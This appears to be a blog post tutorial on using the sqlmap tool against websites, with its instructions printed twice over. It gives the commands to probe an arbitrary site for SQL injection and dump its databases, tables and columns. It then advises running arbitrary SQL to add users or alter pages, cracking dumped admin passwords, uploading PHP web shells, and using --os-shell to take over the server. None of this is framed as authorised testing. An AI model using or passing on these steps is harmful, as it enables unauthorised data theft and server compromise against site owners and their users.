Here is SQL injection tools for linux. It`s SQLMAP. SQLMAP is python based tool , so you can run in any os which has python installed.So it also works in windows.SQLMAP is far more advanced than HAVIJ.
(1)Download SQLMAP here.
(2)Now extract it wherever you want.
(3)Change directory & I mean if you extract to download then, open terminal & type following code
cd Downloads
cd sqlmapproject-sqlmap-f305dde
(4)Now if you want to find url is vulnerable to sql injection or not. Type following command
nirav@ubuntu:~/Downloads/sqlmapproject-sqlmap-f305dde$ ./sqlmap.py -u “vulnerable url of website”
(5)To get database of website. Type following command in terminal
nirav@ubuntu:~/Downloads/sqlmapproject-sqlmap-f305dde$ ./sqlmap.py -u “vulnerable url of website” --dbs
(6)To get tables & columns of database , type following command
nirav@ubuntu:~/Downloads/sqlmapproject-sqlmap-f305dde$ ./sqlmap.py -u “vulnerable url of website”--tables --columns
(7)To Get data of particular database & Table , type following command
nirav@ubuntu:~/Downloads/sqlmapproject-sqlmap-f305dde$ ./sqlmap.py -u “vulnerable url of website” --dump -D “database_name” -T “table _name”
Now , you can view all database from following directory.
/home/nirav/Downloads/sqlmapproject-sqlmap-f305dde/output
1-Execute arbitrary Sql command on the server
This is probably the easiest thing to do on a server that is vulnerable to sql injection. The --sql-query parameter can be used to specify a sql query to execute. Things of interest would be to create a user in the users table or something similar. Or may be change/modify the content of cms pages etc.
Another parameter --sql-shell would give an sql shell like interface to run queries interactively.
2-Get inside the admin panel and play
If the website is running some kind of custom cms or something similar that has an admin panel, then it might be possible to get inside provided you are able to crack the password retrieved in the database dump. Simple and short length passwords can be broken simply by brute forcing, however long length complex passwords may not be breakable.
Check if the admin panel allows to upload some files. If an arbitrary php file can be uploaded then it be a lot greater fun. The php file can contain shell_exec, system ,exec or passthru function calls and that will allow to execute arbitrary system commands. Php web shell scripts can be uploaded to do the same thing.
3-Shell on remote OS
This is the thing to do to completely takeover the server. However note that it is not as easy and trivial as the tricks shown above. sqlmap comes with a parameter call --os-shell that can be used to try to get a shell on remote system, but it has many limitations of its own.
How To Use SqlMap?
(1)Download SQLMAP here.
(2)Now extract it wherever you want.
(3)Change directory & I mean if you extract to download then, open terminal & type following code
cd Downloads
cd sqlmapproject-sqlmap-f305dde
(4)Now if you want to find url is vulnerable to sql injection or not. Type following command
nirav@ubuntu:~/Downloads/sqlmapproject-sqlmap-f305dde$ ./sqlmap.py -u “vulnerable url of website”
(5)To get database of website. Type following command in terminal
nirav@ubuntu:~/Downloads/sqlmapproject-sqlmap-f305dde$ ./sqlmap.py -u “vulnerable url of website” --dbs
(6)To get tables & columns of database , type following command
nirav@ubuntu:~/Downloads/sqlmapproject-sqlmap-f305dde$ ./sqlmap.py -u “vulnerable url of website”--tables --columns
(7)To Get data of particular database & Table , type following command
nirav@ubuntu:~/Downloads/sqlmapproject-sqlmap-f305dde$ ./sqlmap.py -u “vulnerable url of website” --dump -D “database_name” -T “table _name”
Now , you can view all database from following directory.
/home/nirav/Downloads/sqlmapproject-sqlmap-f305dde/output
What`s next you can do?
1-Execute arbitrary Sql command on the server
This is probably the easiest thing to do on a server that is vulnerable to sql injection. The --sql-query parameter can be used to specify a sql query to execute. Things of interest would be to create a user in the users table or something similar. Or may be change/modify the content of cms pages etc.
Another parameter --sql-shell would give an sql shell like interface to run queries interactively.
2-Get inside the admin panel and play
If the website is running some kind of custom cms or something similar that has an admin panel, then it might be possible to get inside provided you are able to crack the password retrieved in the database dump. Simple and short length passwords can be broken simply by brute forcing, however long length complex passwords may not be breakable.
Check if the admin panel allows to upload some files. If an arbitrary php file can be uploaded then it be a lot greater fun. The php file can contain shell_exec, system ,exec or passthru function calls and that will allow to execute arbitrary system commands. Php web shell scripts can be uploaded to do the same thing.
3-Shell on remote OS
This is the thing to do to completely takeover the server. However note that it is not as easy and trivial as the tricks shown above. sqlmap comes with a parameter call --os-shell that can be used to try to get a shell on remote system, but it has many limitations of its own.
No comments:
Post a Comment